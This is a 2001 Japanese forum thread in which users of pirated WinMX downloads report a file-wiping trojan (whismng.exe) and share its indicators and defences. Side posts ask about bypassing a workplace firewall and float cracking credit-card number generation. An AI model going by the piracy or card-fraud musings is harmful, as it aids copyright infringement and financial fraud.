9PnzGJVQS71DstPPfDEhmZX4P0qNVTUcQ5WUE7u4D4bbRV2VfXMQVaAoBzqDMquF
FP/oYzMpjYVI+i5wS4jxcndQVnvN1V4j0TaUYZHuBTz/fXYkStsHMbUpab3winPv
yeH32mu5mfZQeXBt7Vjmi2X97D3c
=hwlh
-----END PGP PUBLIC KEY BLOCK-----

も、漏れの公開キー。。。
コレでPGP掛けてどっか公開してケレ。

108 :名無しさん@お腹いっぱい。:01/10/06 01:07

       ∧ ∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
〜′ ̄ ̄( ゚Д゚)<  逝ってよし!!!
 UU ̄ ̄ U U  \_____________

109 :名無しさん@お腹いっぱい。:01/10/06 01:28
>>108
なんで?
意味わかってる?

110 :名無しさん@お腹いっぱい。:01/10/06 01:40
>>107
すんません、僕スキルがないので、それの意味がわかりません…
でも、公開しても警察のお世話にならないのなら、どこかに公開してアドレス貼ります

111 :107:01/10/06 01:50
>>110
無理しなくてok。
貴方もPGP使ってなければ意味無いし、この為だけに入れるの大変。。

公開というより、上のキーで暗号化した奴、戻してファイルの中身みれるの
基本的に漏れだけ(w
・・本来こういう目的にこそ使われてたと思われ>PGP

112 :名無しさん@お腹いっぱい。:01/10/06 01:53
普通に公開したら警察のお世話になるよ。気をつけてね。

113 :名無しさん@お腹いっぱい。:01/10/06 02:50
うーん、なんとかして107さんに渡せるといいですね。
そうすれば、どんな仕組みのプログラムかわかるし、
もしかして復旧のヒントもわかるかもしれない。

114 :名無しさん@お腹いっぱい。:01/10/06 03:24
>>113
ワラタw

115 :名無しさん@お腹いっぱい。:01/10/06 03:24
>>114
ハァ??

116 :名無しさん@お腹いっぱい。:01/10/06 09:00
先月はじめ、こいつにやられた。外出だけど報告しとくね。
・MXやってた
・Acrobat5J入れた直後、ガリガリ言い始めた(再起動前)
・再起動したら全部消えた
・FINALDATA買ってきたら全部33KB
Acrobatかどうかは知らんが、あきらめた。IEEEの外付HDも消えた。

117 :名無しさん@お腹いっぱい。:01/10/06 09:43
>>104>>105
他スレから来ました。一応こっちでも報告。ファイルサイズ28MくらいのLightWave7
にも、これ入ってる奴があります。症状まったく同じ。フォルダだけ残ってファイルは
復活させるとみんな33バイト。

118 :名無しさん@お腹いっぱい。:01/10/06 10:38
>>117
俺もそれでやられた。シーグラフで配ってた体験版をクラックしたやつね。

119 :名無しさん@お腹いっぱい。:01/10/06 10:39
>>117
他に、この話題があるスレがあるんですか?
どのスレか教えていただけると助かります。

120 :名無しさん@お腹いっぱい。:01/10/06 12:32
>>116
Acroのサイズ教えて

121 :名無しさん@お腹いっぱい。:01/10/06 12:51
他の板から来ました。一応そこに書いたやつ↓
知らなかった。やっぱ他にもいたんですね。

> Virtual PC。
> 生まれて初めて被害にあった。
> ウィルスチェックにもひっかからなかったやつだが。
> ハードディスクがガリガリいう異変に気づいて
> 1GBほどの損失ですんだ。
> 危うく、ドライブ全部逝かれるとこでした。

Virtual PCのインストールファイルのあるドライブ(Eドライブ)と
マイドキュメント(Cドライブ)やられました。
既出のようにFinaldataも試したけどダメ。
C:\WINNT\System32\whismng.exe
がレジストリのRunにありました。
あとCドライブとインストールファイルのあるドライブに
テキストファイルでpiracyだろって。
Virtual PCのシリアルミスったのでトラップかと思ったが、
そういうことだったのね。

122 : :01/10/06 13:48
結局インストール時には専用のPCでしかやらないのが1番なのかな

中古のUSBのHDDにOSだけ入れて起動チェックをすると。
でもBIOSレベルで弄られたら駄目か う〜ん

123 :117:01/10/06 15:05
>>119

http://choco.2ch.net/test/read.cgi/download/1000483999/

ダウンロード板ね。

>>122

あっちにも書いたけど、VirtualPC使うと便利よ。もちろんトロイの
入ってない奴ね(笑・・・えねーよ・・・)。

124 :名無しさん@お腹いっぱい。:01/10/06 17:21
これマジでやばいよヽ(;´Д`)ノ

125 :名無しさん@お腹いっぱい。:01/10/06 18:00
要は、インストールした後にすぐ再起動せずに、
C:\WINNT\System32\whismng.exe
を削除すればいいだけの話じゃん。

皆の情報のおかげで対策がはっきりしているので、
今はそんなに怖くない。

126 :名無しさん@お腹いっぱい。:01/10/06 18:22
>>125マジッすか?ヽ(;´Д`)ノ

127 :名無しさん@お腹いっぱい。:01/10/06 18:25
>>126
俺は一度やられてるし。
直後は、原因が不明でかなり怖かったけど(再発症の可能性もわからんし)
このスレでいろいろ情報交換をしていたら原因がつかめたので今は怖くない。

128 :名無しさん@お腹いっぱい。:01/10/06 18:26
ちなみに俺は、ローカルのドライブ220GBと、
ネットワークドライブ120GBを消されたのでかなり鬱だった・・・

129 :名無しさん@お腹いっぱい。:01/10/06 18:38
>>128
よく立ち直れたな

130 :名無しさん@お腹いっぱい。:01/10/06 18:57
>>128
それはきわめてきついな・・・

131 :名無しさん@お腹いっぱい。:01/10/06 19:38
割れやってなけりゃ大丈夫?

132 :名無しさん@お腹いっぱい。:01/10/06 19:52
>>125
ファイル名は変えられちゃうかもよ・・・

>>131
まずは大丈夫でしょう。メーカー製のインストーラーに混入してたら
大問題だ。ウィルスじゃないからね。

133 :名無しさん@お腹いっぱい。:01/10/06 21:57
起動時にプログラム走らせるのが目的なわけでしょ。
だから、スタートアップさせるレジストリ値、system.iniなんかの値、
最低限で良いからマメに確認しとく。ソフトインストールするたびに。
んで、覚えの無い値できてたら、再起動する前にどのアプリに対する
値なのか、不審なフアイルに対する値なら、納得できるまで色々調べる。
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
今時典型的過ぎるけど、↑この辺の値ぐらいは常に押さえとく。。

134 :HD:01/10/06 22:17
HDが不正読み込みをする時は要注意と聞いたことがある。
たいてい、何か入れられて今回のような事態が起こることもあり得ると。

135 :同じ:01/10/06 22:57
MXやってるやつ。エロげーもこれが入っていた。「君がいる永遠」という
ゲームを交換したら、セットアップが自動でならず、おまけに起動し直したら
見事にそのものも消して、40Gが33バイトのファイルの流れになり見事になくなった。
MXでエロゲにトロイかましているやつのことは聞いたことがあるが、まさか
こんなに大きいものにまであったなんて。
810Mぐらいのやつで、GCA。ZIPに変えたものもあったので
ZIPも危険だ。ダウンロード板のやつも見ていると思うので、ここに書いた。
あと、別の板で陵辱奇行というゲームでもにたようなことがあったといっていたので
きをつけて。
もうMXは危険すぎてできない。

136 :名無しさん@お腹いっぱい。:01/10/06 23:10
もっとも違反行為だから警察に言えないよな…
ネットランナーも自粛しろ!

137 :名無しさん@お腹いっぱい。:01/10/07 00:22
AI将棋2002.zip(34,840,870バイト)
MXでおとしたんだけど気をつけて!Whiterだっけ?はいってるよ

これ解凍して中のexe起動した後になんとなく
msconfigでスタートアップみてみたら
C:\WINNT\SYSTEM\whismng.exe -next
ってあったよ・・・
しかもAI将棋2002だと思ったら2000だったし・・・

138 :名無しさん@お腹いっぱい。:01/10/07 00:26
whistlerだ ごめんなさい

139 :名無しさん@お腹いっぱい。:01/10/07 00:28
要するに、増殖してるってことか…

140 :名無しさん@お腹いっぱい。:01/10/07 00:44
やっぱ割れにはそれなりのリスクが伴うって事でしょ。

141 :名無しさん@お腹いっぱい。:01/10/07 00:49
>>140
まあ、そういうことはここではおいといて
とりあえずどんなソフトに混入していたかっていう報告が集まるスレになればいいんじゃないですか

そういうのを言い出したら泥沼になっちゃいます(w

142 :名無しさん@お腹いっぱい。:01/10/07 00:52
泥沼になりそうだが、
割れ物によって被った被害って立件できるの?

143 :名無しさん@お腹いっぱい。:01/10/07 01:03
もう少し早くこの板見てれば・・・・・
やられました・・・・・

144 :名無しさん@お腹いっぱい。:01/10/07 01:20
このトロイ仕掛けてMXでばらまいてるやつ、日本人じゃないのか?
この板も見てて、今後、ファイル消去の実行の仕方を巧妙に変えてくる可能性は多いにある。

145 :名無しさん@お腹いっぱい。:01/10/07 01:21
なんかひところのインチキエロビデオ販売業者みたい。
こっちもものがものだけに訴えられない(w

146 :名無しさん@お腹いっぱい。:01/10/07 01:24
解凍前にアンチウイルスソフトで発見可能?

147 :名無しさん@お腹いっぱい。:01/10/07 01:27
「START and STOP」という、スタートアップ監視ソフトはどこでダウンロード出来るのですか?

148 :名無しさん@お腹いっぱい。:01/10/07 01:30
やはりか。エロゲー、アプリ関係なくなってきている。
二度もやられた。一度はアップルのムービープレイヤー、正確な
名前は忘れたが、それのpro版で全滅。
proではなく、ふつうのやつだったのを、名前を変えていた。
それでようやく再開してエロゲーなら大丈夫だろうと思って
インタラクトプレイVRというのをanimefantsiaのやつから
交換してといわれたから交換したら、起動確認のため、インストール
画面を出しただけで、再起動のあと33バイト。
大物だろうとなんだろうとどれが危険かもうわからない。
そいつに攻撃したくても方法もわからないし。
一応言っておくが780Mのだった。

149 :名無しさん@お腹いっぱい。:01/10/07 01:31
>>146
ダメ、解凍後のwhismng.exeもダメだった。
今後は対応されるかもしれないが。

150 :名無しさん@お腹いっぱい。:01/10/07 01:34
>>149
「解凍後」じゃなくて「インストール後」だった。

151 :名無しさん@お腹いっぱい。:01/10/07 01:38
>>149
ノートンは対応してるっぽいんだけどダメなのか・・・。

152 :名無しさん@お腹いっぱい。:01/10/07 01:46
MXを結構しているんだが、最近エロゲを交換してもまともなやつがないこと
がちらほらある。ファイルはあるのに起動出来ないものだったり、ダミーなら
まだ分かるが一部のファイルが巧妙に抜かれて、途中までしかできないのが
あったり、むろんトロイが見つかったのも4回あった。
夏休みがおわってから、交換の質ががくんと落ちたこともあるが、やはり
大物でも悪質な物が増えてきている。

153 :名無しさん@お腹いっぱい。:01/10/07 01:58
MXで落としたVirturl PC 4.1でやられました。(Serial なし)
Nortonの9/26版でも引っかかりません。

2000を再起動する度にフォルダを残して全ファイル消去されるのはご存じの通り。

ただし相対ディレクトリ指定でシステムを認識しているのか、CドライブのWin98は
無傷だった。(メインはPドライブに入れたWin2000を使用していた)
98からNTFSマウントできない(やってない)のでPドライブのウィルスチェック
はしてません。はぁ、もっと早くこのスレ知ってれば・・・
(つか、この対策の為にVirtual PC入れて死んだらシャレにもならんが)

154 :名無しさん@お腹いっぱい。:01/10/07 02:09
>>147
http://www.tfi-technology.com/downloads.htm

ソフトをインストールしたらすぐにチェックしてみて
なんかぁゃιぃのが登録されてたら、消したらいいよ

レジストリ直接いじっても同じ事が出来るけど、そういうのに抵抗があるなら
こっちを使ってもいいと思う
なんせ手軽だしね

155 :名無しさん@お腹いっぱい。:01/10/07 02:10
あっ、「割れ物をインストールした後に」すぐにチェックしてみて
って言う意味ね

156 :名無しさん@お腹いっぱい。:01/10/07 02:48
スタートアップに登録されるならどうにかできそうだが、
>>116 みたいに再起動前に実行されたら終わりだよな。

MXで実行可能なファイルは避けるか・・・

157 :名無しさん@お腹いっぱい。:01/10/07 02:53
MXで落とせるvirtual PCにも入ってるらしいから
気をつけよう・・・・

158 :名無しさん@お腹いっぱい。:01/10/07 03:11
これって、報復はできないのか。。。

159 :名無しさん@お腹イパーイ:01/10/07 04:17
>>158
MXで割れ交換してること自体違法だから、
ココでこうやって自営処置を考えてるというわけ。

あと、割れやってる人の大半って割れDLしたからと逝って
必ずそれを自分で使ってるわけではない。
相手にも悪意はないと思われる。

160 :名無しさん@お腹イパーイ:01/10/07 04:18
>>159
×自営処置
○自衛処置

161 :名無しさん@お腹いっぱい。:01/10/07 05:34
これって、ホイッスラーって読むんだよね?
笛を吹く人か…。

162 :名無しさん@お腹いっぱい。:01/10/07 05:54
連れてかれちゃうわけだ・・・

163 :名無しさん@お腹いっぱい。:01/10/07 07:00
wininit.ini
[rename]
NULL=C:\windows\ウイルス.exe

再起動した時にあぼ〜ん。(藁

164 :名無しさん@お腹いっぱい。:01/10/07 07:20
なんかこのスレ罠張られてそうな気がするのは俺だけ?
……法人化………提携…………

165 :くもくもがけにぽんちたびなし:01/10/07 10:50
Adobe PageMaker6.0
Adobe Acrobat 5.0 にも入っているのでは?
自分は9月8日にやられた。
フォルダ名のこして全部のドライブに入っていたファイル消された(すべてNTFS)
これって、笛吹き.exeなの?

166 :名無しさん@お腹いっぱい。:01/10/07 11:27
>>165
間違いなし。まさにその症状。

167 :名無しさん@お腹いっぱい。:01/10/07 16:16
>>164
罠? よく意味がわからないが

168 :名無しさん@お腹いっぱい。:01/10/07 16:40
>>159
中には、悪意というか妙な正義感というか、意図的に置いてる輩もいると思う。

169 :名無しさん@お腹いっぱい。:01/10/07 19:19
なんか、p2pの終焉を感じるね・・・

170 :名無しさん@お腹いっぱい。:01/10/07 19:38
つうか、実行ファイルを見知らぬ相手とやりとりするというのが
チョト信じられんのだが・・

171 :名無しさん@お腹いっぱい。:01/10/07 20:55
>>170
こういう場所で得られる情報の信頼性と、本質は同じだよ。最後は
自分の眼力にかかってる。リスクと限界を承知の上で使えば、非常に
強力なツールとなる点も同じ。

172 :名無しさん@お腹いっぱい。:01/10/07 22:31
なんつーか・・・

泥棒が泥棒仲間の盗品交換会でGetしたものには
ろくでもないもんがついていた。・・・って、
利益を得るものは正規ディストリビュータ。
不利益は我々。けれども他人のPCをどうこうしていいのか。

よくわからん。

173 :名無しさん@お腹いっぱい。 :01/10/07 22:46
なんかPCが再起動できなくなったよ。
ブートエリアがぐにゃぐにゃされたみたい。
OS入れ直したよ。

174 :172:01/10/07 22:55
リチャードストールマンによればソフトウェアは
自由であるべきだ、との主張がある。

割れも俺の中では支持するべきものだった。が、しかし
誰かの手によって正規ディストリを強制される状況が生まれた。

考えるべし。正規品を購入するか、起動前にレジストリを見るか。
それぞれの生き方が問われる。

まいっかー。

175 :名無しさん@お腹いっぱい。:01/10/07 23:17
俺も割れはやるけど、割れが悪なのは当然でしょう。
考えても見ろ。自分が10年かけて開発・販売にこぎつけたソフトウェアが
割れで出回っていた上、売上が伸びなかった時のことを。

まぁこういった議論はこのスレでやるのはふさわしくないから、
この話題はもう終わり。

176 :名無しさん@お腹いっぱい。:01/10/08 02:16
終わりと言われていながらもう一言だけ。

ソフトが不当に高いから、割れざるを得ないという事情もあるでしょ。作っている側に
とっては、割れざーがいるから高くしないと利益を確保できない、という話に
なるんだろうが。

音楽の世界でソフトシンセってジャンルがあるのご存知?OSレベルで使うVSC88とか
とはちょっと違って、音楽製作ソフトのプラグインという形式のもの。最初の製品群が
非常に割安感のある相場を作ってくれたおかげで、どれもこれもリーズナブルな価格で
買えるんだよね。Mac/Win版同梱が常識だし。3Dの世界のプラグインとはぜんぜん違う
かんじ。実際漏れは山のように買ってしまったよ。

こういう空気が他のジャンルにも広がってくれるといいんだけどねえ。

177 :名無しさん@お腹いっぱい。:01/10/08 02:21
>>176
同じソフトでも、1つ大きな違いがあるんですよ。
それは、「商用」か「非商用」jか。
ソフトシンセなんて一般ユーザーが趣味で買うだけだけど、
フォトショップなどのデザイン用ソフトは主にプロが買うもの。
プロが買うソフトは高くても問題ない。というかそれでいい。
それが買えるくらいの利益を出せないようならその仕事はやめたほうがいい。
そういうこと。

3Dも当然趣味でやることもあるけど、趣味用のソフトはちゃんと安い。
Shadeとかね。

178 :名無しさん@お腹いっぱい。:01/10/08 02:24
あ、良く読んだらプロ用のソフトシンセの話だったのね。

ソフトの値段は、開発にかかる技術力も関係してくると思うよ。
音の世界はもうほとんど技術は出尽くしているので開発は
難しくない。
グラフィックの世界はどんどん新しい技術が作られていって、
開発に要する技術力もケタ違い。

179 :名無しさん@お腹いっぱい。:01/10/08 02:34
良いスレですね

180 :176:01/10/08 03:01
>>178
それは率直に言って、グラフィックを甘やかしすぎ、音を甘く見すぎの
見解だと思いますぜ。まあ、まるっきり否定はしませんが。

まったく関係ないけど、かつてShadeが150万円だったことはもちろん
ご存知ですよね?

181 :名無しさん@お腹いっぱい。:01/10/08 03:23
>>180
まぁ感情的にはそう思われるかもしれませんね。
でも事実でしょう。グラフィックの世界では1年前で全然変わります。
それくらい新しい技術が出てきて、古い技術はすぐに売り物にならなくなります。

Shadeの件は当然知ってますよ。そのころはプロのためのツールでしたから。

182 :名無しさん@お腹いっぱい。:01/10/08 03:42
自己責任。(激藁

183 :名無しさん@お腹いっぱい。:01/10/08 03:43
>>182
激しくがいしゅつ。
話の流れを読めやボケ。

184 :名無しさん@お腹いっぱい。:01/10/08 04:45
オレPhotoShop正規ユーザーなんだけど、5→5.5→6と来てコレだったら割れた方がマシだなって思った。
いらんトコばっか機能強化→重くして、レガシーの機能に関しては完全に放置。
大体、Illustratorも持ってる身としては、パス関係強化されても意味無いっての…
最近、本当にプロの人はコレ使ってんのか?って思うことが有る。
>グラフィックの世界では1年前で全然変わります。
ってのはadobeに当てはまるのか?

185 :名無しさん@お腹いっぱい。:01/10/08 05:06
>>184
だったら使うのやめれば?無理して使うことは無い。
俺はバージョンアップしないで古いバージョンを使ってるよ。
というかこの話題は激しくスレ違いだな。CG板でやれ。

186 :名無しさん@お腹いっぱい。:01/10/08 05:24
割れって、著作権侵害じゃないの?
とすれば親告罪だから、メーカーが告訴しなきゃ
タイーホされないんじゃないの?

割れだからって、他人のPC破壊していい事にはならんよ。
意図的に仕組むとか、知ってて配るとかすれば
罪に問えるはず。

例えが悪いけど、マリファナを買ってみたら、実は即効性のある
毒薬で、そうとは知らずに使って死んでしまった場合、毒薬と
知って売った方は殺人罪に問えるのは当然でしょ。

187 :名無しさん@お腹いっぱい。:01/10/08 05:29
>>186
訴えられ、賠償させられるリスクを負うのか?

188 :名無しさん@お腹いっぱい。:01/10/08 05:33
>>186
>割れだからって、他人のPC破壊していい事にはならんよ。

だれもそんな事言ってないんじゃない?
誰に対してのレスだ?番号を書こう。

189 :名無し:01/10/08 05:44
クリーンハンズの原則

190 :名無しさん@お腹いっぱい。:01/10/08 05:59
>>189
それがどうしたの?ちゃんと説明する力が無いのか。

191 :名無しさん@お腹いっぱい。:01/10/08 11:32
>>178
リアルタイム演奏が可能な(レイテンシの小さい)ソフトシンセの歴史は、たかだか
二年程しかないんだが・・・
もう枯れたのか。それは知らなかった。

192 :¥街駅:01/10/08 13:09
ようするに、MXは危険ってことか?
MXの代わりはどんなん使うの?

193 :名無しさん@お腹いっぱい。:01/10/08 13:43
MXが危険って言うより割れが危険なんだろ。

194 :名無しさん@お腹いっぱい。:01/10/08 14:34
MXだろうが何だろうが
ネット繋いでる以上
大なり小なり多少の危険
があることを知れ!!

195 :名無しさん@お腹いっぱい。:01/10/08 15:38
原因が割れモノである以上、被害の正当性を主張するのは難しい。
だから、2ちゃんに情報を求めにやってきてるのではないか。

割れモノが悪い、危険といったことは、すでに百も承知のことなので、ここであえて言う必要はないと思う。

196 :名無しさん@お腹いっぱい。:01/10/08 16:22
このスレに救われた人も多いはず。

197 :kei:01/10/08 17:03
失礼致しました。ネットで株取引をしているのですが、MANEX&E-TRADEの株価のリアルストリーミング機能を会社のLANから使うことができません。
E-TRADEでチェックをかけてみると、ファイアーウォールが邪魔になっているとのこと。これを突破する方法ってご存知無いでしょうか?
ご教授くださいませ。

198 :名無しさん@お腹いっぱい。:01/10/08 17:07
>>197このスレは非常にマジレスが多くて素晴らしいと思いましたがあなたの発言はスレ違い
というか誤爆なされていませんか?

199 : :01/10/08 18:47
>>197
管理者にお願いしなさい。。。
ってか、仕事サボってやってるな(w

200 :名無しさん@お腹いっぱい。:01/10/08 20:57
keiこと>>197には3ヶ月後、逃れられない死がおとずれます。


   ||
 ∧||∧
( / ⌒ヽ
 | |   |  <株・・・E-TRADE・・・
 ∪ / ノ
  | ||
  ∪∪
   ;
 -━━-

201 :名無しさん@お腹いっぱい。:01/10/09 00:25
>>197
うぜーぞ、ゴルァ!!
MANなんたらは独自のポート使ってるからFWは知らずに落としてるんだyo!
MANなんたらに使ってるポートを問い合わせてそのポートを開けるように
管理者にお願いすれ、ゴルァ!!

202 :晒しage:01/10/09 01:02
>>197が立てたスレ(既に荒らされてる)
http://ton.2ch.net/test/read.cgi/sec/1002526806/l50

203 :名無しさん@お腹いっぱい。:01/10/09 01:13
そんなのどうでもいいです。スレ違い。

204 :晒しage:01/10/09 01:52
>>203
死んで

205 :名無しさん@お腹いっぱい。:01/10/09 01:55
割れスレは結局こうなる運命なりか…

206 :ヨシムネー:01/10/09 01:55
優良スレが糞スレに変わる瞬間を見た

207 :ビンラーディン:01/10/09 01:58
つか元々クソスレだろ
ワレザーはどう理由つけても正当化できない
消された>>1も自業自得
よって全員逝って良し
================ 終了 ========================

208 : :01/10/09 02:00
別に、誰も自分のやってることを正当化しようなんて思ってないよ
自衛策を考えてるだけ

209 :名無しさん@お腹いっぱい。:01/10/09 02:15
>>204-207
自作自演バレバレ。
何をそんなに一生懸命になってるんだ?

みなさん、ドキュソは放置しましょう。

210 : :01/10/09 06:55
違法な事やってるんだからそれくらいのリスク背負え

211 :名無しさん@お腹いっぱい。 :01/10/09 06:57
割れずに感染させたやつは悪いのか
感染した割れずを共有してるやつは悪いのか
割れず自体が悪いのか

212 :名無しさん@お腹いっぱい。:01/10/09 08:18
どうでもいいが、スレの内容をよく読まずに発言するのはよせ。
的を得ない発言は、煽りにもなってないぞ。

213 :名無しさん@お腹いっぱい。:01/10/09 10:57
割れずを使わなければ自衛策など必要ない

214 :名無しさん@お腹いっぱい。:01/10/09 11:03
>>212
的をGETしてどーするよ…

215 :名無しさん@お腹いっぱい。:01/10/09 18:16
>>214
くだらんツッコミ。言語は時間とともに変化する。
それがイヤなら古文で喋って、古文で書きこめ。

216 :名無しさん@お腹いっぱい。:01/10/09 20:29
215は

217 :名無しさん@お腹いっぱい。:01/10/09 21:16
考えてみればここの住人は良い実験動物だよね。
割れだから下手に警察には報告出来ない上(実際ここの住人は報告しないし)、被害
報告や対象ソフトや次々と書き込まれるから、仕込む側も実験結果を把握しやすい。
しかもその対策も具体的に把握できるから、次に仕込む際にその対策の裏をかくこと
が容易になる。

俺らって、もしかして踊らされてる?

218 :名無しさん@お腹いっぱい。:01/10/09 21:25
>>214
いや、それを全肯定したら「ボールを聞く」なんて日本語も認めなくちゃならなくなるよ・・・。

219 :名無しさん@お腹いっぱい。:01/10/09 22:08
212=215=ドキュソ

220 :名無しさん@お腹いっぱい。:01/10/09 23:14
>>218
「ボールに聞く」だったらありそうだな。
「なんであそこで内角低めに行ったんですか?」
「ボールに聞いてくれ!」

・・・ゴミレス陳謝。

221 :名無しさん@お腹いっぱい。:01/10/09 23:16
うーん。俺もやられた・・・・早くこのスレを見つけていれば・・・・
俺のバヤイnero5.5日本語版に仕込まれていた(涙
みんな気をつけてね・・・

222 :¥街駅:01/10/09 23:31
お気の毒に・・・
俺も掛かりそう心配だ・・・

223 :名無しさん@お腹いっぱい。:01/10/09 23:32
p2pは 終わったのか

224 :名無しさん@お腹いっぱい。:01/10/09 23:45
割れやらなきゃいいんだろうがどうしてもやりたいなら
PC2台用意してサブマシンでテストすべし。

225 :名無しさん@お腹いっぱい。:01/10/09 23:50
アメリカとかじゃ日常茶飯事なのかな?

226 :名無しさん@お腹いっぱい。:01/10/10 00:00
>>219

212は俺だが、215は俺じゃないぞ。
なぜ一人と思うかね?意味の無い発言は誰もが嫌うんだよ。
それくらいわかれ。空気の読めない奴め。

227 :名無しさん:01/10/10 00:09

   ∧_∧  / ̄ ̄ ̄ ̄ ̄
  (     )< ワレサイトヲオシエレ!!
  (    )  \_____
  | | |
  (__)_)

228 : :01/10/10 00:14
とりあえず、ここでもめるのもなんなんで…
どうせならスレ立てます?
「割れについて思うこと」とか。。。

229 : :01/10/10 00:43
海外サイトだとクレジットカード番号の生成アルゴリズム割ろうと
してるんですけど(w
visaとかmasterとか。

あれって、請求書発行する時はちゃんと個人データ照合取ってんの?
ネットで買い物した奴と、請求書の発送先と。
ネットのオンラインでは番号の有効性しか見てないみたいだけど。
スレの趣旨とだいぶ違うけど。。

230 :晒しage:01/10/10 01:06
糞スレになりましたな。

231 : :01/10/10 01:47
十分情報が集まったので、あとは定期上げするだけでいい
それだけで十分存在意義のあるスレ

232 :名無しさん@お腹いっぱい。:01/10/10 01:49
このウイルスについてこれだけ具体的な情報が集まっているのは、
ネット上でもここくらいだろう。

233 :名無しさん@お腹いっぱい。:01/10/10 02:41
実はきのう1さんと似たような経過で、ノートのHDが逝ってしまいました。
きちんとパッチも入れていたのに・・IEも5.5SP2にしたし。
原因はたぶん・・8日の朝暇だったので「21世紀の姓名判断」というページを
見ようとトップへ行きました。 すると、Flashを5.0を更新するメッセージがでてきたので
無視しようとしたんですが、誤ってポチってしまって・・・・。 未署名ではなかったです。
それから、IEのエラーメッセージが出てきて、この不具合をマイクロソフトに送信するかどうか
聞かれたので、送信してしまったのです。
その後数時間ネットをしていても何の問題もなく無事終了したのに、
昨晩立ち上げようとしたら、スタートアップで4つのモードをチョイスする画面がでて
どのモードでも失敗しました。レジストリも抹消されているでしょう。
HD復元が高額なので、自身で再インストールするつもりです。

234 : :01/10/10 04:02
>>233
それ違うんじゃないの?

オレはIE5.5SP2をインストールした後に、
IEがクラッシュしてエラーメッセージが出て、
この不具合をマイクロソフトに送信するか
どうか聞かれたよ。
個人情報は送信しないって説明(プライバシー
ポリシー)だったけど、何抜かれるかわから
なかったから、送信しなかったけど。

その後、起動不能にはなってないよ。

OSの上書きインストールしてみれば?
単純にHDいかれたのかもよ?

235 :名無しさん@お腹おっぱい。:01/10/10 04:09
[whismng.exe]
SIZE=53248バイト
CRC-32bits=31F6556D
CRC-16bits=B694

ですか?
ちょっと前にWinXPでやられたんだけど。。

236 :名無しさん@お腹いっぱい。:01/10/10 05:41
>>233
それ違います。
再起動の途中では止まりません。

今回のは、
再起動が完了してデスクトップ画面が見えたところで、フォーマットが開始されます。

237 :名無しさん@お腹いっぱい。:01/10/10 05:43
>>233
HDDの内容は壊れてないと思うよ。
新しいフォルダにOSを新規インストールしてみ。
前のOSを消さないように。
そして、HDDから内容を救い出す。

つーかOSは何でしょう?修復インストールすればいいだけかも。

238 : :01/10/10 06:54
このスレにあるプログラムは恐らくHD上のすべてのファイルに対して実行されます
ブートローダーまで抹消してしまうと思われ、ブートすらも出来なくなります

ですから、実行してしまうと、再起動してもBIOSから先には進まなくなります

239 :名無しさん@お腹いっぱい。:01/10/10 13:52
被害にあったって言ってこのスレ盛り上げてるのはMX潰しの一団だろ。
ダウソ板にも来てるな、コイツラ。

240 :名無しさん@お腹いっぱい。:01/10/10 16:37
すべてネタだったとしたら
それはそれですごい>MX潰しの一団

241 :240:01/10/10 16:40
あと、腑に落ちない点がひとつ。
起動ドライブ(インストール先がC:\windows だったらCドライブ)
を起動中にどうやってフォーマットするのか知りたい。
ファイルの削除とフォーマットをいっしょにしてない?

242 :晒しage:01/10/10 16:52
マンコ〜

243 :名無しさん@お腹いっぱい。:01/10/10 17:42
>>236>>241
正確にはフォーマットじゃないね。実際、ディレクトリ構造はそのまま
残ります。ファイルが全て消去されるだけ。多分フォーマットより
始末が悪いと思うけど。

244 :名無しさん@お腹いっぱい。:01/10/10 19:29
どりるチンチンゑQBFHDBWCVBHBHBゑJFCCV「WD
WKKBJWBCV「


RJWHん義KR叙位K 「 LんVKJ;RKゑPKVM


RBVVKJ家PTKP;「「F」;「G「;ンKJHに餌JW
JMKん 「


KじぇTふぃ氏Jん面

245 :名無しさん@お腹いっぱい。:01/10/10 20:32
悲惨だ漏れも気をつけよう

246 :名無しさん@お腹いっぱい。:01/10/10 20:43
安全なVirtual PC4.0の容量教えてくれ〜
俺のはzip圧縮で14,480,615で
解凍すると4つのフォルダと20ファイルになった。

247 :名無しさん@お腹いっぱい。:01/10/10 21:02
やっぱインターネットってのは殺伐としてるんだな。
まさに刺すか刺されるかだよ。気をつけよう。

248 :名無しさん@お腹いっぱい。:01/10/10 21:10
>>241
正確にはフォーマットじゃないよ。
話の流れを見ればわかるけど、皆省略して「フォーマット」と書いている。
いちいち「ファイルを33バイトに上書きしてそれを削除する」
と書くのは長いからね。

249 :名無しさん@お腹いっぱい。:01/10/10 22:06
http://yasai.2ch.net/test/read.cgi/win/999877743/478

250 :ミトコンドリ子:01/10/10 22:08
                          ∧_∧
                       / ̄ ̄⌒ヽ)
                      /  し /| |
                     /     く_| |__
                    ( (○o   _| | ) (⌒ヽ_          
                      ̄| ̄ ̄ ̄/ >__ノ   \  |
           _  ∧_∧   / /  / /        \ \ /)
      ( ̄ ̄ ̄/ ̄ ̄ ̄⌒ヽ (  /(  /          \ \|
       \  /  し /\ \ ) /  ) /           |\  )  
         |/    /   \ \し′ し′           |  \ \_
        /    /___  | |                 \ 入   \
       ( (○o   _  ) ||                   \     |
       /  / ̄ ̄/ /  | ヽ                    \    \今だ!250番
      /  /   / /   丿ノ                      |     \ゲットォォォォ!!
    / /   (  /                            / _    )
   / /     ) /                           / /(、∀ , \ \
  / /      し′                          \ \ ∨ ̄∨ \ \
(  /                                      \ \      \ \
 ) /                                        ) ノ       \ \
 し′                                       し’        ノ_\_つ

251 :名無しさん@お腹いっぱい。:01/10/10 23:38
>>246
それ危ないやつだったような。
もう消したから分かんないが。
Nortonだとチェックしてくれるらしいから大丈夫だと思う。
インストールして再起動前に消せば大丈夫だし。

252 :名無しさん@お腹いっぱい。:01/10/11 00:03
ガイシュツだけど、この仕掛けってある意味最悪と違う?
MXがどうとか、割れがどうとかは俺やってないからどうでもいいが、対
個人だと思わせるような仕掛けっつーのは、いただけないわさ

個人のスキルとか、ネットの危険とかのネガティブキャンペーンやれれ
る可能性が大有りと違う?

糞雑誌がほぼ煽りといってもいいような情報を、全国で発売して、ちょっ
と興味があるウッカリさんが試す→(゚д゚)ウマー!
ネットの自由(無法?)を認識させるのにはいいけど、対個人戦なっちま
うのが怖いよ

253 : :01/10/11 01:30
ちょっとお聞きしていいですか。
このスレ見てから、ふと思いついてcドライブに
直接置いてあるブート関連のファイル
(AUTOEXEC.BATとかCONFIG.SYSやら)見てみたのね。
そしたら、見事に0バイトでファイルはあるのに中身
